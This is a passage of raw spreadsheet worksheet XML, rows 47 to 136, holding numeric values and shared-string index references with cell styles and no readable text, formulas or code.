      <c r="D47" s="109" t="s">
        <v>2960</v>
      </c>
      <c r="E47" s="110" t="s">
        <v>3198</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="101">
        <v>8777.0</v>
      </c>
      <c r="B48" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C48" s="103" t="s">
        <v>348</v>
      </c>
      <c r="D48" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E48" s="105" t="s">
        <v>3199</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="106">
        <v>8838.0</v>
      </c>
      <c r="B49" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C49" s="108" t="s">
        <v>351</v>
      </c>
      <c r="D49" s="109" t="s">
        <v>2960</v>
      </c>
      <c r="E49" s="110" t="s">
        <v>3200</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="101">
        <v>9222.0</v>
      </c>
      <c r="B50" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C50" s="103" t="s">
        <v>357</v>
      </c>
      <c r="D50" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E50" s="105" t="s">
        <v>3201</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="106">
        <v>9441.0</v>
      </c>
      <c r="B51" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C51" s="108" t="s">
        <v>363</v>
      </c>
      <c r="D51" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E51" s="110" t="s">
        <v>3202</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="101">
        <v>9472.0</v>
      </c>
      <c r="B52" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C52" s="103" t="s">
        <v>366</v>
      </c>
      <c r="D52" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E52" s="105" t="s">
        <v>3203</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="106">
        <v>9772.0</v>
      </c>
      <c r="B53" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C53" s="108" t="s">
        <v>372</v>
      </c>
      <c r="D53" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E53" s="110" t="s">
        <v>3204</v>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="101">
        <v>10008.0</v>
      </c>
      <c r="B54" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C54" s="103" t="s">
        <v>379</v>
      </c>
      <c r="D54" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E54" s="105" t="s">
        <v>3205</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="106">
        <v>10383.0</v>
      </c>
      <c r="B55" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C55" s="108" t="s">
        <v>393</v>
      </c>
      <c r="D55" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E55" s="110" t="s">
        <v>3206</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="101">
        <v>10681.0</v>
      </c>
      <c r="B56" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C56" s="103" t="s">
        <v>396</v>
      </c>
      <c r="D56" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E56" s="105" t="s">
        <v>3207</v>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="106">
        <v>10879.0</v>
      </c>
      <c r="B57" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C57" s="108" t="s">
        <v>399</v>
      </c>
      <c r="D57" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E57" s="110" t="s">
        <v>3208</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="101">
        <v>11017.0</v>
      </c>
      <c r="B58" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C58" s="103" t="s">
        <v>402</v>
      </c>
      <c r="D58" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E58" s="105" t="s">
        <v>3209</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="106">
        <v>11130.0</v>
      </c>
      <c r="B59" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C59" s="108" t="s">
        <v>405</v>
      </c>
      <c r="D59" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E59" s="110" t="s">
        <v>3210</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="101">
        <v>11523.0</v>
      </c>
      <c r="B60" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C60" s="103" t="s">
        <v>423</v>
      </c>
      <c r="D60" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E60" s="105" t="s">
        <v>3211</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="106">
        <v>11622.0</v>
      </c>
      <c r="B61" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C61" s="108" t="s">
        <v>426</v>
      </c>
      <c r="D61" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E61" s="110" t="s">
        <v>3212</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="101">
        <v>13120.0</v>
      </c>
      <c r="B62" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C62" s="103" t="s">
        <v>435</v>
      </c>
      <c r="D62" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E62" s="105" t="s">
        <v>3213</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="106">
        <v>13429.0</v>
      </c>
      <c r="B63" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C63" s="108" t="s">
        <v>438</v>
      </c>
      <c r="D63" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E63" s="110" t="s">
        <v>3214</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="101">
        <v>13439.0</v>
      </c>
      <c r="B64" s="102" t="s">
        <v>10</v>
      </c>
      <c r="C64" s="103" t="s">
        <v>441</v>
      </c>
      <c r="D64" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E64" s="105" t="s">
        <v>3215</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="106">
        <v>13597.0</v>
      </c>
      <c r="B65" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C65" s="108" t="s">
        <v>444</v>
      </c>
      <c r="D65" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E65" s="110" t="s">
        <v>3216</v>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="101">
        <v>5.0</v>
      </c>
      <c r="B66" s="102" t="s">
        <v>447</v>
      </c>
      <c r="C66" s="103" t="s">
        <v>448</v>
      </c>
      <c r="D66" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E66" s="105" t="s">
        <v>3217</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="106">
        <v>3468.0</v>
      </c>
      <c r="B67" s="107" t="s">
        <v>15</v>
      </c>
      <c r="C67" s="108" t="s">
        <v>451</v>
      </c>
      <c r="D67" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E67" s="110" t="s">
        <v>3218</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="101">
        <v>5347.0</v>
      </c>
      <c r="B68" s="102" t="s">
        <v>15</v>
      </c>
      <c r="C68" s="103" t="s">
        <v>454</v>
      </c>
      <c r="D68" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E68" s="105" t="s">
        <v>3219</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="106">
        <v>6843.0</v>
      </c>
      <c r="B69" s="107" t="s">
        <v>15</v>
      </c>
      <c r="C69" s="108" t="s">
        <v>457</v>
      </c>
      <c r="D69" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E69" s="110" t="s">
        <v>3220</v>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="101">
        <v>7910.0</v>
      </c>
      <c r="B70" s="102" t="s">
        <v>15</v>
      </c>
      <c r="C70" s="103" t="s">
        <v>460</v>
      </c>
      <c r="D70" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E70" s="105" t="s">
        <v>3221</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="106">
        <v>33.0</v>
      </c>
      <c r="B71" s="107" t="s">
        <v>18</v>
      </c>
      <c r="C71" s="108" t="s">
        <v>463</v>
      </c>
      <c r="D71" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E71" s="110" t="s">
        <v>3222</v>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="101">
        <v>55.0</v>
      </c>
      <c r="B72" s="102" t="s">
        <v>18</v>
      </c>
      <c r="C72" s="103" t="s">
        <v>466</v>
      </c>
      <c r="D72" s="104" t="s">
        <v>2953</v>
      </c>
      <c r="E72" s="105" t="s">
        <v>3223</v>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="106">
        <v>37.0</v>
      </c>
      <c r="B73" s="107" t="s">
        <v>20</v>
      </c>
      <c r="C73" s="108" t="s">
        <v>469</v>
      </c>
      <c r="D73" s="109" t="s">
        <v>2960</v>
      </c>
      <c r="E73" s="110" t="s">
        <v>3224</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="101">
        <v>658.0</v>
      </c>
      <c r="B74" s="102" t="s">
        <v>20</v>
      </c>
      <c r="C74" s="103" t="s">
        <v>478</v>
      </c>
      <c r="D74" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E74" s="105" t="s">
        <v>3225</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="106">
        <v>5.0</v>
      </c>
      <c r="B75" s="107" t="s">
        <v>22</v>
      </c>
      <c r="C75" s="108" t="s">
        <v>481</v>
      </c>
      <c r="D75" s="109" t="s">
        <v>3032</v>
      </c>
      <c r="E75" s="110" t="s">
        <v>3226</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="101">
        <v>42.0</v>
      </c>
      <c r="B76" s="102" t="s">
        <v>22</v>
      </c>
      <c r="C76" s="103" t="s">
        <v>484</v>
      </c>
      <c r="D76" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E76" s="105" t="s">
        <v>3227</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="106">
        <v>120.0</v>
      </c>
      <c r="B77" s="107" t="s">
        <v>22</v>
      </c>
      <c r="C77" s="108" t="s">
        <v>487</v>
      </c>
      <c r="D77" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E77" s="110" t="s">
        <v>3228</v>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="101">
        <v>190.0</v>
      </c>
      <c r="B78" s="102" t="s">
        <v>22</v>
      </c>
      <c r="C78" s="103" t="s">
        <v>490</v>
      </c>
      <c r="D78" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E78" s="105" t="s">
        <v>3229</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="106">
        <v>323.0</v>
      </c>
      <c r="B79" s="107" t="s">
        <v>22</v>
      </c>
      <c r="C79" s="108" t="s">
        <v>493</v>
      </c>
      <c r="D79" s="109" t="s">
        <v>3032</v>
      </c>
      <c r="E79" s="110" t="s">
        <v>3230</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="101">
        <v>327.0</v>
      </c>
      <c r="B80" s="102" t="s">
        <v>22</v>
      </c>
      <c r="C80" s="103" t="s">
        <v>496</v>
      </c>
      <c r="D80" s="104" t="s">
        <v>3042</v>
      </c>
      <c r="E80" s="105" t="s">
        <v>3231</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="106">
        <v>374.0</v>
      </c>
      <c r="B81" s="107" t="s">
        <v>22</v>
      </c>
      <c r="C81" s="108" t="s">
        <v>499</v>
      </c>
      <c r="D81" s="109" t="s">
        <v>3001</v>
      </c>
      <c r="E81" s="110" t="s">
        <v>3232</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="101">
        <v>413.0</v>
      </c>
      <c r="B82" s="102" t="s">
        <v>22</v>
      </c>
      <c r="C82" s="103" t="s">
        <v>502</v>
      </c>
      <c r="D82" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E82" s="105" t="s">
        <v>3233</v>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="106">
        <v>417.0</v>
      </c>
      <c r="B83" s="107" t="s">
        <v>22</v>
      </c>
      <c r="C83" s="108" t="s">
        <v>505</v>
      </c>
      <c r="D83" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E83" s="110" t="s">
        <v>3234</v>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="101">
        <v>430.0</v>
      </c>
      <c r="B84" s="102" t="s">
        <v>22</v>
      </c>
      <c r="C84" s="103" t="s">
        <v>508</v>
      </c>
      <c r="D84" s="104" t="s">
        <v>3008</v>
      </c>
      <c r="E84" s="105" t="s">
        <v>3235</v>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="106">
        <v>23179.0</v>
      </c>
      <c r="B85" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C85" s="108" t="s">
        <v>514</v>
      </c>
      <c r="D85" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E85" s="110" t="s">
        <v>3236</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="101">
        <v>23345.0</v>
      </c>
      <c r="B86" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C86" s="103" t="s">
        <v>520</v>
      </c>
      <c r="D86" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E86" s="105" t="s">
        <v>3237</v>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="106">
        <v>23415.0</v>
      </c>
      <c r="B87" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C87" s="108" t="s">
        <v>523</v>
      </c>
      <c r="D87" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E87" s="110" t="s">
        <v>3238</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="101">
        <v>23790.0</v>
      </c>
      <c r="B88" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C88" s="103" t="s">
        <v>526</v>
      </c>
      <c r="D88" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E88" s="105" t="s">
        <v>3239</v>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="106">
        <v>24661.0</v>
      </c>
      <c r="B89" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C89" s="108" t="s">
        <v>529</v>
      </c>
      <c r="D89" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E89" s="110" t="s">
        <v>3240</v>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="101">
        <v>24780.0</v>
      </c>
      <c r="B90" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C90" s="103" t="s">
        <v>532</v>
      </c>
      <c r="D90" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E90" s="105" t="s">
        <v>3241</v>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="106">
        <v>25929.0</v>
      </c>
      <c r="B91" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C91" s="108" t="s">
        <v>535</v>
      </c>
      <c r="D91" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E91" s="110" t="s">
        <v>3242</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="101">
        <v>26066.0</v>
      </c>
      <c r="B92" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C92" s="103" t="s">
        <v>538</v>
      </c>
      <c r="D92" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E92" s="105" t="s">
        <v>3243</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="106">
        <v>26307.0</v>
      </c>
      <c r="B93" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C93" s="108" t="s">
        <v>544</v>
      </c>
      <c r="D93" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E93" s="110" t="s">
        <v>3244</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="101">
        <v>26881.0</v>
      </c>
      <c r="B94" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C94" s="103" t="s">
        <v>547</v>
      </c>
      <c r="D94" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E94" s="105" t="s">
        <v>3245</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="106">
        <v>29115.0</v>
      </c>
      <c r="B95" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C95" s="108" t="s">
        <v>553</v>
      </c>
      <c r="D95" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E95" s="110" t="s">
        <v>3246</v>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="101">
        <v>29292.0</v>
      </c>
      <c r="B96" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C96" s="103" t="s">
        <v>556</v>
      </c>
      <c r="D96" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E96" s="105" t="s">
        <v>3247</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="106">
        <v>29372.0</v>
      </c>
      <c r="B97" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C97" s="108" t="s">
        <v>559</v>
      </c>
      <c r="D97" s="109" t="s">
        <v>3042</v>
      </c>
      <c r="E97" s="110" t="s">
        <v>3248</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="101">
        <v>29421.0</v>
      </c>
      <c r="B98" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C98" s="103" t="s">
        <v>562</v>
      </c>
      <c r="D98" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E98" s="105" t="s">
        <v>3249</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="106">
        <v>29424.0</v>
      </c>
      <c r="B99" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C99" s="108" t="s">
        <v>565</v>
      </c>
      <c r="D99" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E99" s="110" t="s">
        <v>3250</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="101">
        <v>29439.0</v>
      </c>
      <c r="B100" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C100" s="103" t="s">
        <v>568</v>
      </c>
      <c r="D100" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E100" s="105" t="s">
        <v>3251</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="106">
        <v>29594.0</v>
      </c>
      <c r="B101" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C101" s="108" t="s">
        <v>571</v>
      </c>
      <c r="D101" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E101" s="110" t="s">
        <v>3252</v>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="101">
        <v>30161.0</v>
      </c>
      <c r="B102" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C102" s="103" t="s">
        <v>580</v>
      </c>
      <c r="D102" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E102" s="105" t="s">
        <v>3253</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="106">
        <v>30432.0</v>
      </c>
      <c r="B103" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C103" s="108" t="s">
        <v>583</v>
      </c>
      <c r="D103" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E103" s="110" t="s">
        <v>3254</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="101">
        <v>30950.0</v>
      </c>
      <c r="B104" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C104" s="103" t="s">
        <v>592</v>
      </c>
      <c r="D104" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E104" s="105" t="s">
        <v>3255</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="106">
        <v>31015.0</v>
      </c>
      <c r="B105" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C105" s="108" t="s">
        <v>595</v>
      </c>
      <c r="D105" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E105" s="110" t="s">
        <v>3256</v>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="101">
        <v>31369.0</v>
      </c>
      <c r="B106" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C106" s="103" t="s">
        <v>598</v>
      </c>
      <c r="D106" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E106" s="105" t="s">
        <v>3257</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="106">
        <v>31677.0</v>
      </c>
      <c r="B107" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C107" s="108" t="s">
        <v>601</v>
      </c>
      <c r="D107" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E107" s="110" t="s">
        <v>3258</v>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="101">
        <v>32072.0</v>
      </c>
      <c r="B108" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C108" s="103" t="s">
        <v>604</v>
      </c>
      <c r="D108" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E108" s="105" t="s">
        <v>3259</v>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="106">
        <v>32096.0</v>
      </c>
      <c r="B109" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C109" s="108" t="s">
        <v>607</v>
      </c>
      <c r="D109" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E109" s="110" t="s">
        <v>3260</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="101">
        <v>32111.0</v>
      </c>
      <c r="B110" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C110" s="103" t="s">
        <v>610</v>
      </c>
      <c r="D110" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E110" s="105" t="s">
        <v>3261</v>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="106">
        <v>32145.0</v>
      </c>
      <c r="B111" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C111" s="108" t="s">
        <v>613</v>
      </c>
      <c r="D111" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E111" s="110" t="s">
        <v>3262</v>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="101">
        <v>33689.0</v>
      </c>
      <c r="B112" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C112" s="103" t="s">
        <v>616</v>
      </c>
      <c r="D112" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E112" s="105" t="s">
        <v>3263</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="106">
        <v>33949.0</v>
      </c>
      <c r="B113" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C113" s="108" t="s">
        <v>619</v>
      </c>
      <c r="D113" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E113" s="110" t="s">
        <v>3264</v>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="101">
        <v>2826.0</v>
      </c>
      <c r="B114" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C114" s="103" t="s">
        <v>622</v>
      </c>
      <c r="D114" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E114" s="105" t="s">
        <v>3265</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="106">
        <v>2962.0</v>
      </c>
      <c r="B115" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C115" s="108" t="s">
        <v>625</v>
      </c>
      <c r="D115" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E115" s="110" t="s">
        <v>3266</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="101">
        <v>3032.0</v>
      </c>
      <c r="B116" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C116" s="103" t="s">
        <v>628</v>
      </c>
      <c r="D116" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E116" s="105" t="s">
        <v>3267</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="106">
        <v>3090.0</v>
      </c>
      <c r="B117" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C117" s="108" t="s">
        <v>631</v>
      </c>
      <c r="D117" s="109" t="s">
        <v>3042</v>
      </c>
      <c r="E117" s="110" t="s">
        <v>3268</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="101">
        <v>3110.0</v>
      </c>
      <c r="B118" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C118" s="103" t="s">
        <v>634</v>
      </c>
      <c r="D118" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E118" s="105" t="s">
        <v>3269</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="106">
        <v>3130.0</v>
      </c>
      <c r="B119" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C119" s="108" t="s">
        <v>640</v>
      </c>
      <c r="D119" s="109" t="s">
        <v>3042</v>
      </c>
      <c r="E119" s="110" t="s">
        <v>3270</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="101">
        <v>3184.0</v>
      </c>
      <c r="B120" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C120" s="103" t="s">
        <v>643</v>
      </c>
      <c r="D120" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E120" s="105" t="s">
        <v>3271</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="106">
        <v>3185.0</v>
      </c>
      <c r="B121" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C121" s="108" t="s">
        <v>646</v>
      </c>
      <c r="D121" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E121" s="110" t="s">
        <v>3272</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="101">
        <v>3207.0</v>
      </c>
      <c r="B122" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C122" s="103" t="s">
        <v>649</v>
      </c>
      <c r="D122" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E122" s="105" t="s">
        <v>3273</v>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="106">
        <v>7946.0</v>
      </c>
      <c r="B123" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C123" s="108" t="s">
        <v>666</v>
      </c>
      <c r="D123" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E123" s="110" t="s">
        <v>3274</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="101">
        <v>7992.0</v>
      </c>
      <c r="B124" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C124" s="103" t="s">
        <v>669</v>
      </c>
      <c r="D124" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E124" s="105" t="s">
        <v>3275</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="106">
        <v>8023.0</v>
      </c>
      <c r="B125" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C125" s="108" t="s">
        <v>672</v>
      </c>
      <c r="D125" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E125" s="110" t="s">
        <v>3276</v>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="101">
        <v>8494.0</v>
      </c>
      <c r="B126" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C126" s="103" t="s">
        <v>678</v>
      </c>
      <c r="D126" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E126" s="105" t="s">
        <v>3277</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="106">
        <v>8732.0</v>
      </c>
      <c r="B127" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C127" s="108" t="s">
        <v>681</v>
      </c>
      <c r="D127" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E127" s="110" t="s">
        <v>3278</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="101">
        <v>8765.0</v>
      </c>
      <c r="B128" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C128" s="103" t="s">
        <v>684</v>
      </c>
      <c r="D128" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E128" s="105" t="s">
        <v>3279</v>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="106">
        <v>8792.0</v>
      </c>
      <c r="B129" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C129" s="108" t="s">
        <v>687</v>
      </c>
      <c r="D129" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E129" s="110" t="s">
        <v>3280</v>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="101">
        <v>8888.0</v>
      </c>
      <c r="B130" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C130" s="103" t="s">
        <v>690</v>
      </c>
      <c r="D130" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E130" s="105" t="s">
        <v>3281</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="106">
        <v>9667.0</v>
      </c>
      <c r="B131" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C131" s="108" t="s">
        <v>696</v>
      </c>
      <c r="D131" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E131" s="110" t="s">
        <v>3282</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="101">
        <v>10053.0</v>
      </c>
      <c r="B132" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C132" s="103" t="s">
        <v>699</v>
      </c>
      <c r="D132" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E132" s="105" t="s">
        <v>3283</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="106">
        <v>7.0</v>
      </c>
      <c r="B133" s="107" t="s">
        <v>29</v>
      </c>
      <c r="C133" s="108" t="s">
        <v>702</v>
      </c>
      <c r="D133" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E133" s="110" t="s">
        <v>3284</v>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="101">
        <v>65.0</v>
      </c>
      <c r="B134" s="102" t="s">
        <v>29</v>
      </c>
      <c r="C134" s="103" t="s">
        <v>705</v>
      </c>
      <c r="D134" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E134" s="105" t="s">
        <v>3285</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="106">
        <v>68.0</v>
      </c>
      <c r="B135" s="107" t="s">
        <v>29</v>
      </c>
      <c r="C135" s="108" t="s">
        <v>708</v>
      </c>
      <c r="D135" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E135" s="110" t="s">
        <v>3286</v>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="101">
        <v>70.0</v>
      </c>
      <c r="B136" s="102" t="s">
        <v>29</v>
      </c>
